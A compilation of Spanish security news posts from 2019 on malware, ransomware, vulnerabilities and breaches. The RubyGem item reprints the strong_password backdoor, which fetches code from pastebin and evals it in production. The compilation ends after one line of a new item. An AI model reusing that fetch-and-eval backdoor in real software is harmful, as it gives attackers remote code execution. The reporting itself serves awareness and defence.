‘Silex’, así ha sido bautizado el nuevo malware que está atacando a dispositivos IoT de todo el mundo y que en poco tiempo ha atacado de forma exitosa más de 2000 dispositivos en pocas horas.

La muestra ha sido descubierta por el investigador de seguridad Larry W. Cashdollar (@_larry0), investigador de seguridad en Akamai (@Akamai), el cual a través de un tweet anunciaba de la existencia de una muestra que estaba atacando estos dispositivos.

Los dispositivos atacados no están limitados técnicamente, aunque actualmente, los objetivos de Silex son dispositivos IoT con base GNU/Linux y con las credenciales de acceso por defecto. Una vez localizado el dispositivo objetivo el malware, se autentica eliminan su funcionalidad bloqueando el dispositivo.

Para realizar el bloqueo de los dispositivos, el malware escribe de forma aleatoria usando ‘/dev/random’ hasta que deja sin espacio al dispositivo, después elimina las reglas del firewall y configuraciones de red, y por último, reinicia el dispositivo para dejarlo totalmente inútil. Es curioso encontrar un malware con este objetivo, cuya finalidad única sea el hacer daño por hacer, ya que es de los pocos que no recogen información de las víctimas o piden rescates para obtener un lucro o beneficio económico tal y como afirma el investigador de seguridad Ankit Anubhav (@ankit_anubhav) en un tweet, pero Silex no es así, simplemente realiza acciones destructivas.

Los servidores de control y comandos (C&C) utilizados por la muestra utiliza la IP 185[.]162[.]235[.]56, hospedadas por Novinvps, vinculada a Irán, lo que pude dar a pensar que los objetivos (o futuros objetivos) puedan ser meramente políticos.

El malware fue creado por una persona que se hace llamar ‘Light Leafon’ y dice tener 14 años según Ankit Anubhav, quien asegura haber contactado con el creador de la muestra cuando este lanzó el precursor de Silex ‘HITO’.

No es la primera vez que se crea malware para atacar a este tipo de dispositivos, en 2017 ya salió a la luz el malware ‘Brickerbot’, el cual dañó a millones de dispositivos en todo el mundo.

Para volver convertir el dispositivo en útil es necesario volver a instalar el firmware de dispositivo. Una acción que no está al alcance de cualquier persona que no tenga uno conocimientos técnicos mínimos.

Más información:

Silex malware bricks thousands of IoT devices in a few hours
https://securityaffairs.co/wordpress/87609/iot/silex-malware-bricks-iot-devices.html

An 14-year-old’s Internet-of-Things worm is bricking shitty devices by the thousands
https://boingboing.net/2019/06/25/teenaged-kicks.html

New Linux Worm Attacks IoT Devices
https://www.darkreading.com/iot/new-linux-worm-attacks-iot-devices/d/d-id/1335065

La policía alemana ha asaltado recientemente la vivienda en la que residía el desarrollador de la herramienta de administración remota para Android, MacOS, Linux y Windows «OmniRAT».

El desarrollador de la herramienta de administración remota (RAT), OmniRAT, fue sorprendido en el día de ayer en su casa por la policía de alemana. La policía asaltó su casa y precintó sus dispositivos: un portátil, un ordenador de sobremesa y algunos teléfonos móviles.

OmniRAT comenzó, en Noviembre de 2015, como un software para el control remoto de sistemas de forma legítima, pensada como una herramienta para administradores de sistemas. Se convirtió rápidamente en la herramienta más popular para administrar y monitorizar dispositivos Windows, Android, MacOS y Linux.

A principios de año, la herramienta fue utilizada por un grupo de delincuentes con fines maliciosos, instalándose a través de un exploit que aprovechaba una antigua vulnerabilidad de Microsoft Excel (CVE-2016-7262) , y al igual que otras herramientas similares, se ha acabado usando como RAT en diferentes ataques.

En uno de los ataques realizados en Enero de este año, y de acuerdo a un reporte realizado por un investigador de seguridad, los ficheros Excel utilizados para explotar la vulnerabilidad suplantaban a la empresa «Kuwait Petroleum Corporation» (KPC). De esta forma, los atacantes trataban de hacer más creíble el fichero para que las víctimas abriesen el fichero y fuesen infectados.

Aunque la compañía KPC no estuvo afectada por el ataque, si que se usó su nombre para la realización del ataque, por lo que los abogados de la compañía solicitaron al registrante del dominio de OmniRAT que proporcionasen los datos del dueño.

Aunque en su web el autor de la herramienta informa de que se trata de una herramienta legítima y que no tiene nada que ver con un troyano, parece que podría tener problemas legales debido al mal uso de la herramienta por parte de cibercriminales.

Actualmente se desconoce si la acción de la policía se produjo por la investigación realizada por KCP o si se debe a otro caso diferente que afecte al desarrollador.

Más información:

Exclusive: German Police Raid OmniRAT Developer and Seize Digital Assets
https://thehackernews.com/2019/06/police-raid-omnirat-developer.html

Se han descubierto varias vulnerabilidades en la interfaz web de administración de Cisco Data Center Network Manager (DCNM) que permitirían a un atacante remoto robar la cookie de sesión activa saltándose la autenticación, subir archivos, y como consecuencia ejecutar código remoto como usuario root.

DCNM es el sistema de administración de red para todos los sistemas NX-OS que utilizan el hardware Nexus de Cisco en los centros de datos. Se encarga de solucionar problemas, detectar errores de configuración, etc. Por lo que es una parte importante para las organizaciones que utilizan Nexus switches.

La primera vulnerabilidad descubierta (CVE-2019-1619) permite a un atacante robar la cookie de sesión activa sin necesidad de conocer el usuario administrativo o contraseña. Para ello es necesario enviar una petición HTTP especialmente diseñada a un web servlet especifico que se encuentre en los dispositivos afectados.

Versiones afectadas:
– Cisco eliminó el uso del web servlet afectado en la versión 11.1, por lo que afecta a todas las versiones inferiores a 11.1

Por otro lado, la vulnerabilidad clasificada como CVE-2019-1620 se debe a una configuración incorrecta de los permisos en el software DCNM. Aprovechando este error, un atacante podría crear y escribir archivos mediante el envío de datos a un servlet web específico que se encuentra en los dispositivos afectados. De esta manera es posible incluso ejecutar código remoto con privilegio root.

Versiones afectadas:
– En las versiones inferiores a 11.1 de DCNM les afecta este fallo, pero es necesario autenticarse para aprovechar esta vulnerabilidad.
– En la versión 11.1 de DCNM no es necesario estar autenticado para acceder al servlet web afectado y explotar dicha vulnerabilidad.

En la versión 11.2 Cisco elimina la utilización del servlet web afectado del software, con lo que queda parcheada dicha vulnerabilidad.

Por el momento el equipo PSIRT de Cisco no tienen conocimiento del uso malicioso de estas vulnerabilidades hasta el momento. Cisco también recomiendan actualizar a la última versión, indicando en su página web los pasos a seguir.

Más información:

Cisco Data Center Network Manager Authentication Bypass Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass

Cisco Data Center Network Manager Arbitrary File Upload and Remote Code Execution Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex

New Cisco critical bugs: 9.8/10-severity Nexus security flaws need urgent update
https://www.zdnet.com/article/new-cisco-critical-bugs-9-810-severity-nexus-security-flaws-need-urgent-update/

Recientemente se ha detectado una aplicación maliciosa en el Google Play que pasaba por un juego de terror.

El juego, llamado «Scary Granny ZOMBIE Mod: The Horror Game 2019», contenía código malicioso que se activaba dos días después de su instalación.

Lo más llamativo es que se trataba de un juego totalmente funcional, por lo que los usuarios podían jugar sin problemas. Probablemente este detalle junto a los chequeos del sistema, que no permitian al malware ejecutar el código malicioso justo después de su instalación, han permitido que pase desapercibido para el equipo de revisión de Google Play.

Una vez publicado en la tienda oficial de aplicaciones de Google, el juego ha conseguido más de 50 mil descargas, pasando totalmente desapercibido para todas sus víctimas.

Tras dos días con el juego instalado, este empieza a efectuar las primeras acciones maliciosas. Entre ellas, mostrar una falsa notificación de los servicios de seguridad de Google, que tras aceptar, muestra una falsa ventana de phishing solicitando los credenciales de Google.

Una vez que la víctima introduce sus credenciales, la aplicación comienza a robar datos como emails de recuperación de contraseñas, códigos de verificación, cookies, tokens, etc. Los autores de la aplicación estaban especialmente interesados en el robo de datos de Google y Facebook de las víctimas.

Además de las funcionalidades para el robo de credenciales, este malware incluía funcionalidades para mostrar anuncios no deseados por el usuario, que simulaban ser apps legítimas de Facebook o Amazon, entre otras.

No es la primera vez que una aplicación maliciosa se cuela en la tienda oficial de Google, como ya hemos podido ver en ocasiones anteriores. Desde Hispasec recomendamos tener precaución con las aplicaciones que se instalan en el dispositivo, e instalar únicamente aplicaciones necesarias y conocidas.

Más información

Fuente: https://www.bleepingcomputer.com/news/security/android-horror-game-steals-google-facebook-credentials-and-data/

El troyano de acceso remoto llamado Ratsnif, usado es campañas de ciber-espionaje, tiene ahora nuevas capacidades; permite modificar paginas web y secuestro SSL.

OceanLotus es un grupo de hacking que se cree que actua en nombre del estado Vietnamita en las operaciones de espionaje.

También conocido como APT32, CobalKitty, SeaLotus y APT-C-00 en la comunidad infosec, los atacantes típicamente combinan malware único con utilidades comerciales como Cobalt Strike.

Investigadores de Blackberry Cylance analizaron cuatro variantes de la familia de Ratsnif donde se muestra como evoluciona de un build de debug a una version release con capacidades como tráfico de paquetes, ARP, DNS y MAC spoofing, redirección e inyección HTTP y habilitar una shell de acceso remoto.

Las tres primeras versiones que Cylance vió tienen una fecha de compilación de 2016, mientras que la última, también reportada por Macnica Networks, era de agosto de 2018.

La versión más antigua de Ratsnif vista por los investigadores es una build debug que fue compilada el 5 de agosto de 2016; el dominio para el servidor C2 fue activado el mismo día.

Menos de un día después, apareció una nueva versión con cambios menores. Ambas muestras se escanearon en VirusTotal en busca de detecciones.

Un tercer desarrollo, con fecha de compilación el 13 de Septiembre de 2016, era muy similar en funcionalidad con las dos muestras previas. Los investigadores creen que es una de las primeras versiones desplegadas de Ratsnif por el grupo OceanLotus.

No tiene todas las capacidades de la última versión pero podía configurar una shell remota y servir para ARP spoofing, DNS spoofing y redirección HTTP.

Más Información:

https://www.bleepingcomputer.com/news/security/oceanlotus-apt-uses-new-ratsnif-trojan-for-network-attacks/

Florida ha pagado, en dos semanas, más de 1,1 millones de dólares en bitcoins a cibercriminales para así poder recuperar archivos que han sido cifrados tras un ataque de ransomware. Las ciudades afectadas han sido Riviera Beach y Lake City.

Lake City, una ciudad al norte de Florida, pagó el pasado lunes 24 de junio 42 bitcoins, que es el equivalente a unos 573,300 dólares, para descifrar teléfonos móviles y correos que fueron cifrados tras un ransomware que paralizó sus sistemas informáticos durante 2 semanas.

Este ataque se denominó «Triple Amenaza» puesto que combinaba tres métodos diferentes para atacar a los sistemas conectados en red. Esta infección que afectó a Lake City fue llevada a cabo después de que un empleado del ayuntamiento abriera un correo electrónico malicioso el pasado 10 de junio.

Aunque el equipo de soporte desconectó los ordenadores 10 minutos después de que comenzase el ataque, ya era demasiado tarde, el ataque se expandió y bloqueó las cuentas de correo y de los servidores de los trabajadores de la ciudad.

Como los departamentos de Policía y Bomberos trabajaban desde una red y servidor distintos (disponían de una red y estructura de servidores segmentada), fueron los únicos que no fueron afectados por el ataque. Por otro lado, otras redes de Lake City están actualmente deshabilitadas. También es importante destacar que los servicios de Seguridad Pública no se han visto afectados por el ataque.

Los cibercriminales contactaron con la aseguradora de la ciudad y negociaron el pago de un rescate de 42 bitcoins. Los funcionarios de Lake City votaron el lunes 24 pagar el rescate y poder así recuperar el acceso a los archivos.

Este pago por el rescate estaría cubierto principalmente por el seguro, aunque los contribuyentes incurrirían en 10,000$.

Lake City es la segunda ciudad de Florida afectada por el ransomware. La otra ciudad fue Riviera Beach, la cual fue víctima de un ataque de ransomware el 29 de mayo después de que otro empleado abriese un link malicioso dentro de un correo cuidadosamente elaborado para efectuar el ataque.

Este ataque bloqueó los ordenadores de la ciudad por, al menos, 3 semanas. Tras estos sucesos, el Ayuntamiento de la ciudad autorizó a la aseguradora de la ciudad para que pagase el rescate de 65 Bitcoins (897,650 dólares actualmente) para poder recuperar el acceso a sus sistemas bloqueados.

En lugar de pagar el rescate, la recomendación es disponer de copias de seguridad que se realicen de forma periódica en dispositivos independientes y cifrados que no estén conectados a la red, así cómo disponer de un plan de contingencia y formar a los empleados para que no abran correos que puedan ser sospechosos al igual que no abrir todos los archivos que se reciban.

La vulnerabilidad sólo requiere abrir un fichero .html malicioso con el navegador para tener acceso a los archivos del directorio.

Según ha demostrado Barak Tawily, un analista de seguridad que ya reportó una vulnerabilidad similar, la implementación de Same Origin Policy (SOP) de Firefox para el esquema «file://» permite listar y acceder a ficheros del mismo directorio y subdirectorios. Un atacante podría mediante un fichero .html descargado de Internet y abierto con Firefox acceder a todos los archivos donde se descargó el documento.

La vulnerabilidad, que todavía no ha sido parcheada y no se espera que se solucione de momento, se debería a que el RFC de ‘SOP’ para el esquema «file://» no deja claro cual debe ser el comportamiento en estos casos, por lo que cada navegador acaba haciendo su propia implementación del estándar.

En la prueba de concepto (PoC) realizada por Tawily y grabada en vídeo puede comprobarse cómo abriendo un fichero ‘.html’ descargado y abierto desde las descargas de Firefox sin que se muestre ningún aviso es posible acceder a ficheros sensibles del directorio sin que el usuario se dé cuenta.

El fallo en realidad no es nuevo, pues ya fue reportado en Netscape 6 y Mozilla en el 2002, reportándose en nuevas ocasiones con el mismo efecto.

De momento la única solución es no abrir ficheros ‘.htm’ o ‘.html’ de local utilizando Firefox. Una posible alternativa, y sólo si es estrictamente necesario, sería copiar el archivo a una carpeta vacía, y abrirlo desde dicha carpeta.

Más información:

Firefox Local Files Theft – not patched yet:
https://quitten.github.io/Firefox/

Un grupo organizado de ciberdelincuentes ha atacado y, posiblemente, infectado a empleados del gobierno croata entre los meses de febrero y abril de este año.

Los atacantes han llevado a cabo una campaña de phishing que imitaba las notificaciones de entrega de los servicios postales croatas u otras empresas. Los correos electrónicos contenían un enlace a una página web con URL similar a la original en la que se pedía a los usuarios que descargasen un documento de Excel.

Cuidado con los adjuntos

Como es de esperar, el documento ocultaba en las macros numerosas líneas de código malicioso. Una vez que abrimos el documento se nos descargaría e instalaría malware en el equipo. Durante el análisis del ataque fueron detectados dos payloads distintos.

El primero fue reconocido como la puerta trasera Empire, un componente de Empire post-exploitation framework, y el segundo se reconoció como SilentTrinity, otra herramienta post-explotación similar a la primera.

El gobierno croata detectó el ataque en abril

La oficina de seguridad de sistemas de información, la autoridad responsable de la ciberseguridad de los organismos estatales de Croacia, emitió una alerta sobre el ataque

La agencia estatal de ciberseguridad compartió claves de registro, nombres de archivos, URLs e IPs de los servidores de control (C2) que usaban los atacantes y además, pidió a las agencias estatales que revisasen los registros y analizasen los equipos en busca de malware.

No se le ha atribuido la autoría del ataque a ningún grupo específico pero tras la investigación los expertos dijeron que «los datos disponibles sobre los hosts, direcciones y dominios utilizados, así como el alto número de conexiones entre ellos, sugieren un esfuerzo a gran escala.»

Fuente: https://www.zdnet.com/article/croatian-government-targeted-by-mysterious-hackers/

Cuando escuchamos la palabra ransomware a muchos de nosotros se nos erizan los pelos de los brazos al imaginar todos nuestros archivos secuestrados por algún ciberdelincuente que intenta sacar tajada.

A continuación veremos las principales vías de propagación que utilizan los atacantes para infectar a las víctimas y algunos consejos para intentar defendernos.

Propagación

Aunque existen diversas formas de propagación, alguna de ellas muy imaginativa, el vector más común de difusión es por correo electrónico.

Cabe destacar que, aunque paguemos el rescate por nuestros datos, nadie nos asegura que el atacante vaya a enviarnos la clave de descifrado. Además, si pagamos el rescate, es posible que el atacante vuelva a cifrar nuestros datos para volver a obtener su recompensa.

Ingeniería social – El archivo infectado suele adjuntarse al correo como .doc, .docx, .xls o .xlsx. se intenta persuadir al usuario para que abra el archivo y poder ejecutar las macros. Una vez se ejecutan el equipo queda infectado.

Malvertising – En esta variante el atacante crea una red publicitaria para distribuir el malware. El anuncio falso puede mostrarse en sitios legítimos, cuando el usuario hace click en el anuncio, el malware es descargado en el equipo.

Kits de exploiting – Los atacantes desarrollan código para aprovechar vulnerabilidades. Este tipo de ataque puede infectar a cualquier equipo conectado en red que tenga un software desactualizado.

¿Que pasa después de la descarga?

El ransomware tiene muchas formas de mostrarse al usuario, desde que empezó a popularizarse se ha ido actualizando para hacerlo más sofisticado y destructivo, por lo que no es de extrañar encontrarse casos de malware asociado en el que nuestro secuestro de datos venga acompañado de otros programas maliciosos que roben información, abran puertas traseras o instalen botnets que zombiefiquen nuestro terminal.

A continuación se nos puede pedir un pequeño rescate mediante el envío de un SMS, aunque con la constante evolución que ha sufrido este tipo de ataques ha ido perfeccionando el método de pago, por lo que, actualmente, suele pedirse la realización de una transferencia a un monedero electrónico. Esto permite maximizar la anonimización por parte del atacante.

A medida que se han ido sofisticando los métodos de pago también se han ido añadiendo mejoras al mecanismo de extorsión utilizado por los atacantes. En el último año, según Kaspersky, el número de ataques se quintuplicó. También se duplicaron los ataques a usuarios corporativos.

Este tipo de malware no solo cifra los datos de nuestro ordenador, cada vez se está popularizando más en dispositivos móviles e IoT.

¿Cómo puedo protegerme?

El ransomware suele trabajarse desde la prevención, por lo que las primeras medidas que se deben adoptar pasan por la concienciación y la formación, dos bloques imprescindibles que nos ayudarán a obetener buenos hábitos.

Dentro del bloque de formación se recomienda adquirir conocimientos que nos ayuden a identificar ataques de ingeniería social.

Consejos rápidos:

• No abras correos de usuarios desconocidos y desconfía de los archivos adjuntos que contengan.
• Mantén actualizado nuestro sistema.
• Revisa los links antes de hacer click.
• Asegúrate de tener contraseñas robustas.
• Haz copias de seguridad con regularidad.

Desde el punto de vista más técnico tenemos que tener especial cuidado en la vigilancia de la infraestructura de nuestro sistema para asegurar que los servicios internos de la empresa no se vean expuestos al exterior.

Investigadores de Proofpoint han detectado que el grupo ruso de cibercriminales TA505 ha iniciado una campaña con un malware llamado androMut. Este malware cuenta técnicas antianálisis muy sofisticadas que podrían estar inspiradas en el downloader Andromeda.

Las infecciones con este tipo de malware son especialmente peligrosas ya que suelen hacerse de forma silenciosa. Los usuarios y las compañías no suelen darse cuenta de que estás siendo infectados a no ser que el atacante decida instalar malware adicional o proceder al robo de credenciales.

Esta nueva campaña ha venido acompañada del envío masivo de cientos de miles de mensajes en las regiones afectadas, con señuelos objetivo y técnicas efectivas de ingeniería social.

Desde la compañía señalan que el nuevo downloader AndroMut, combinado con el RAT FlawedAmmy como payload, parece haberse convertido en un nuevo vector de ataque para estos cibercriminales este verano.

Más información:

El grupo de cibercriminales TA505 estrena malware contra bancos de EAU, Corea del Sur, Singapur y EE UU
https://globbsecurity.com/el-grupo-de-cibercriminales-ta505-estrena-malware-contra-bancos-de-eau-corea-del-sur-singapur-y-ee-uu-44806/

La Britain’s Information Commissioner’s Office (ICO) ha impuesto una multa a la compañía aérea British Airways por la brecha de seguridad ocurrida el pasado año y perpetrada por el grupo delictivo Magecart, el cual ya vulneró otros sitios de comercio electrónico como Ticketmaster.

La filtración que ha originado la multa incluye la información bancaria y personal de 380.000 usuarios que realizaron reservas durante 2 semanas del pasado año. El ataque se perpretró a través de código Javascript incluido en el sitio web de la aerolínea, el cual registraba los datos de compra de los usuarios.

La multa de 183 millones de libras supone el 1,5% de la facturación de British Airways en 2017, la cual aunque cuantiosa aún queda lejos del 4% máximo que podría alcanzar por una infracción del nuevo Reglamento General de Protección de Datos (GDPR). Willie Walsh, consejero del grupo IAG, al que pertenece British Airways, se ha mostrado sorprendido y decepcionado por la sanción propuesta, la cual tienen 28 días para apelar.

El importe por la infracción queda muy lejos de las 500.000 libras por el escándalo de Cambridge Analytica o las también 500 mil libras que se impusieron a Equifax.

Más información:
British Airways faces record £183m fine for data breach:
https://www.bbc.com/news/business-48905907

Se ha encontrado una nueva familia de ransomware dirigida a dispositivos de almacenamiento conectado a la red (NAS). Estos están basados ​​en Linux fabricados por los sistemas QNAP y que mantienen a los usuarios como rehenes de datos importantes hasta que se paga un rescate.

Descubierto de forma independiente por investigadores de dos firmas de seguridad independientes, Intezer y Anomali, la nueva familia de ransomware se enfoca en los servidores NAS de QNAP mal protegidos o vulnerables ya sea por fuerza bruta forzando credenciales SSH débiles o explotando vulnerabilidades conocidas.

Apodado «QNAPCrypt» por Intezer y «eCh0raix» por Anomali, el nuevo ransomware está escrito en el lenguaje de programación Go y encripta los archivos con extensiones dirigidas mediante el cifrado AES y agrega una extensión encriptada a cada uno. Sin embargo, si un dispositivo NAS comprometido se encuentra en Bielorrusia, Ucrania o Rusia, el ransomware termina el proceso de cifrado de archivos y finaliza sin modificarlos.

En caso de llevarse a cabo el ataque, tras la ejecución, el ransomware primero se conecta a su servidor remoto de C&C, protegido detrás de la red Tor, utilizando un proxy Tor SOCKS5 para notificar a los atacantes sobre nuevas víctimas.

«Según el análisis, está claro que el autor del malware ha configurado el proxy para proporcionar a la red Tor el acceso al malware sin incluir la funcionalidad propia de Tor»

Investigadores de Anomali.

Antes de cifrar archivos, el ransomware solicita una dirección única de billetera de bitcoin, donde las víctimas deben transferir la cantidad del rescate. Esta dirección la obtiene desde el servidor de C&C del atacante que contiene una lista predefinida de monederos ya creados.

Si el servidor se queda sin direcciones de bitcoin únicas, el ransomware no procede a cifrar archivos y espera a que los atacantes creen y proporcionen una nueva dirección.

«Pudimos recopilar un total de 1,091 billeteras únicas destinadas a nuevas víctimas distribuidas en 15 campañas diferentes».

Como recordatorio, instamos a los usuarios a que habiliten las actualizaciones automáticas para mantener el firmware actualizado.

Entre las webs infectadas se cuentan sitios que están en el top 2000 de los rankings Alexa.

Grupos de cibercriminales, comúnmente asociados con el nombre Magecart, caracterizados, entre otras cosas, por inyectar código javascript malicioso en las plataformas de e-commerce con el objeto de robar datos confidenciales de tarjetas de crédito, infectan más de 17.000 dominios web a través de instancias de Amazon S3 mal configuradas.

El informe, que puede consultarse aquí, incluye no sólo análisis detallados del procedimiento de infección, sino también métodos de mitigación o indicadores de compromiso. En él, se explica cómo los atacantes han aplicado una estrategia donde prime el alcance frente a la precisión. Esto es, los atacantes han optado por asegurar que su infección llegue al mayor número de víctimas posible, en vez de seleccionar concienzudamente los objetivos más sensibles o interesantes para sus fines.

Se trata de procedimientos similares a las infecciones sufridas por webs como AdMaxim, CloudCMS o Picreel. Sin embargo, los investigadores advierten que, a pesar de los esfuerzos por monitorizar estos ataques, esta campaña, detectada a principios de abril de 2019, posee una envergadura mucho mayor de lo que predecían los informes iniciales.

Según los investigadores, Magecart ha dedicado una gran cantidad de tiempo a rastrear la red en busca de instancias de Amazon S3 mal configuradas que permitan de forma pública consultar y editar el contenido de la instancia. Una vez encontradas, añadían código javascript malicioso al final de cada archivo javascript.

Usualmente, este código malicioso suele inyectarse en archivos javascript relacionados directamente con la página de pagos del sitio. Sin embargo, se han encontrado archivos js infectados, lo que indica, como se reseñaba anteriormente, un sacrificio de la especificidad de los objetivos en favor de un alcance mucho mayor.

Pese a que este alcance extendido lo sea en detrimento de una mayor precisión en la selección de objetivos, los investigadores insisten en que si los atacantes consiguen que cualquiera de las páginas infectadas recolecte algún dato sensible, el esfuerzo de los atacantes quedaría amortizado dado el retorno de la inversión que ganarían con los datos obtenidos.

Adicionalmente, este nuevo ataque involucra una manera novedosa de inyectar el código malicioso. En este caso, se ha optado por utilizar versiones altamente ofuscadas de código javascript.

El coste de esta clase de ataques asciende a cifras notables. Como ya contábamos en este artículo, la última empresa afectada fue British Airways, obligada a pagar una multa de 183.000.000 de libras.

Un elevado número de teclados y ratones inalámbricos de Logitech presentan vulnerabilidades de seguridad. Un atacante podría espiar las pulsaciones e incluso infectar la máquina.

El investigador de seguridad Marcus Mengs ha descubierto que un gran número de teclados y ratones de Logitech son vulnerables a ataques mediante wireless. Su investigación sobre las conexiones wireless de los mencionados dispositivos ha puesto al descubierto numerosas debilidades. Estas vulnerabilidades afectan a teclados, ratones, y a punteros láser inalámbricos.

Los fallos permitirían a un atacante espiar las pulsaciones de los teclados. Todo lo que el usuario escribe puede ser capturado y leído por un potencial atacante. También permitiría enviar cualquier comando si un dispositivo vulnerable está conectado a la máquina víctima.

Marcus Mengs demuestra cómo infectar un sistema con un troyano controlado remotamente por radio. El uso de un canal de radio, implica que el ataque es incluso efectivo con máquinas que ni siquiera están conectadas a Internet.

Según el fabricante, cualquier dispositivo de la firma Logitech con la tecnología de radio Unifying es vulnerable. Esta clase de tecnología está presente en los dispositivos de la compañía desde el año 2009. Los receptores USB vulnerables son reconocidos por un pequeño logo naranja con forma de estrella.

La serie gaming Lightspeed y los dispositivos apuntadores R500 y Spotlight están también afectados. Los punteros láser R400, R700 y R800 no son vulnerables a este ataque, pero sí lo son a otro ataque ya descubierto conocido como Mousejack.

Las dos vulnerabilidades, tienen como identificadores CVE-2019-13053 y CVE-2019-13052.

La vulnerabilidad CVE-2019-13053 permite a un atacante remoto inyectar cualquier pulsación en la comunicación de radio cifrada sin necesidad de conocer la clave criptográfica. Para lograrlo, el atacante sólo necesitaría acceso temporal al teclado. Según Mengs, otra forma de inyectar pulsaciones sería observando durante unos segundos el trafico de radio mientras el usuario está escribiendo y al mismo tiempo, procesar esa información para atacar el cifrado.

La segunda vulnerabilidad, con identificador CVE-2019-13052 permite a un atacante descifrar la comunicación entre el teclado y la máquina anfitriona si se ha interceptado el proceso de emparejamiento.

Para protegerse de estas vulnerabilidades es conveniente actualizar el firmware a la versión más reciente en los dispositivos afectados. Logitech recomienda usar el programa Logitech Firmware Update Tool SecureDFU para llevar a cabo la actualización.

Más Información:

https://github.com/mame82/UnifyingVulnsDisclosureRepo

https://www.adslzone.net/2019/07/08/logitech-vulnerabilidad-unifying-ratones/

https://www.heise.de/ct/artikel/Logitech-keyboards-and-mice-vulnerable-to-extensive-cyber-attacks-4464533.html?hg=1&hgi=7&hgf=false

Se ha descubierta una red internacional de criptominería ilegal en España que ha llegado a generar unos 50 millones de euros.

La red ha sido descubierta por dos investigadores españoles, Serio Pastrana (Universidad Carlos III) y Guillermo Suarez-Tangil (King’s College), que han sido capaces de analizar la red que minaba criptomonedas a través de un malware desde PC de terceros.

Los investigadores encontraron que los ciberdelincuentes minaban Monero, una de las criptomonedas más codiciadas debido a que según su diseño es prácticamente irrasteable y que según el estudio, más del 4% de las criptomonedas Monero en circulación fueron generadas por este red.

La red utilizaban dos métodos para capturar el PC de la víctima:

• El primer método es a través de una página web especialmente manipulada la cual contiene un script malicioso que es capaz de utilizar la CPU de la víctima, una solución efectiva, pero en cuanto la víctima cierra la página web, el script deja de minar.
• El segundo método, algo más elaborado y consiste en la inyección de un malware en la computadora, método que consigue hacer que la infección tenga persistencia en el equipo infectado. Este malware, tiene la peculiaridad funcionalidad que es capaz de apagarse cuando el usuario abre el administrador de tareas para dificultar su detección.

Una vez minado el equipo infectado, la muestra era capaz de transferir las criptomonedas generadas a las carteras digitales de los ciberdelincuentes.

Esta investigación que ha abarcado desde los años 2007 hasta 2018, ha servido también para ver la evolución que ha tenido este malware a lo largo del tiempo que, según los investigadores, llega al millar de muestras. Una cifra bastante elevada que ha servido para generar, solo en esta red analizada, unos 50 millones de euros en los últimos 10 años.

Más información:

First Look at the Crypto-Mining Malware Ecosystem: A Decade of Unrestricted Wealth
https://arxiv.org/abs/1901.00846

España descubre un ecosistema multimillonario de criptominería ilegal
https://www.technologyreview.es/s/11045/espana-descubre-un-ecosistema-multimillonario-de-criptomineria-ilegal

PDF del estudio
https://arxiv.org/pdf/1901.00846

El desarrollador Tute Costa ha descubierto un backdoor alojado en una popular librería (Gem) de Ruby llamada strong_password, utilizada para comprobar la robustez de las contraseñas elegidas por los usuarios.

El código malicioso comprueba si la biblioteca se está utilizando en un entorno de producción, en caso afirmativo descarga y ejecuta un payload desde la plataforma pastebin.com, un conocido repositorio de texto online. Al ejecutarse el payload se crea la puerta trasera en la app o página web dando acceso a la ejecución de código remoto al atacante.

def _!;
  begin;
    yield;
  rescue Exception;
  end;
end

_!{
  Thread.new {
    loop {
      _!{
        sleep rand * 3333;
        eval(
          Net::HTTP.get(
            URI('https://pastebin.com/raw/xa456PFt')
          )
        )
      }
    }
  } if Rails.env[0] == "p"

El backdoor envía la URL de cada sitio infectado a «smiley.zzz.com.ua», quedándose a la espera de nuevas instrucciones, que serán recibidas en forma de cookies, desempaquetadas y ejecutadas a través de la función eval. Esto da acceso al atacante a ejecutar código, con el que sencillamente puede conseguir una terminal en el servidor infectado.

En el momento de reportar el problema al propietario de la biblioteca, descubrió que el atacante presuntamente reemplazó al desarrollador real de la librería en RubyGems, repositorio oficial del lenguaje Ruby. Creó una nueva versión (0.0.7) de la ya existente librería con el backdoor en su interior. Según las estadísticas de RubyGems la librería 537 usuarios descargaron esta versión maliciosa. Además el código fuente de esta nueva versión no fue subido a Github, tan solo fue distribuido a través de RubyGems.

Costas reportó tanto al propietario como al equipo de seguridad de RubyGems y la versión maliciosa fue eliminada del repositorio.

Cualquier proyecto que utilice la citada librería strong_password debería ser revisado exhaustivamente para detectar posibles robos de datos de usuarios u otro tipo de acciones llevadas a cabo por el atacante.

Para finalizar, recordar que el modus operandi de este ataque es muy similar al descubierto en abril de este mismo año que afectaba a la librería Bootstrap-Sass de Ruby, utilizando la misma técnica del eval y las cookies para ganar acceso al servidor.

Más información

withstwist.dev
https://withatwist.dev/strong-password-rubygem-hijacked.html

ZDNet
https://www.zdnet.com/article/backdoor-found-in-ruby-library-for-checking-for-strong-passwords/

RubyGems
https://rubygems.org/gems/strong_password/versions/0.0.7

A las vulnerabilidades de los procesadores Intel que permitirían actuar a Spectre o Meltdown, ya conocidas en 2018, se une el descubrimiento de nuevas vulnerabilidades relacionadas con los procesadores usados en data centres con SSD.

En esta ocasión, han sido el especialista Jesse Michael de Eclypsium junto con personal de Intel, quienes han identificado una nueva vulnerabilidad que afecta directamente a la herramienta de diagnóstico del procesador Intel, además de un fallo adicional que afectaría a la seguridad de los data centre SSD.

La vulnerabilidad relacionada con la herramienta de diagnóstico del procesador, se ha catalogado como CVE-2019-11133 con una puntuación CVSS de 8.2 sobre 10. Dicha vulnerabilidad podría permitir a un usuario autentificado realizar una escalada de privilegios con la que podría acceder a información confidencial o realizar ataques de DoS mediante un acceso local.

Por otro lado, la vulnerabilidad que afectaría a los data centres SSD, concretamente a las unidades de las series S4500 y S4600 de Intel, permitiría a un usuario no autentificado escalar privilegios a través de un punto de acceso físico; aunque ha sido puntuada con 5.3 sobre 10 en la escala CVSS, por lo que no se considera crítica.

Intel ha podido lanzar los correspondientes parches de seguridad antes del plazo de 90 días para la divulgación pública de vulnerabilidades. Y aunque la compañía ha resuelto alrededor de 25 vulnerabilidades críticas en lo que va de año, el volumen de vulnerabilidades que se está detectando últimamente parece indicar que la estrategia de seguridad de la compañía debería actualizarse.

Más información

• Intel Data Center SSD Drives Allow Hackers To Take Complete Control Of Server, Information Security Newspaper

Se ha descubierto una vulnerabilidad en WhatsApps y Telegram que permitiría el acceso y manipulación de los ficheros del usuario.

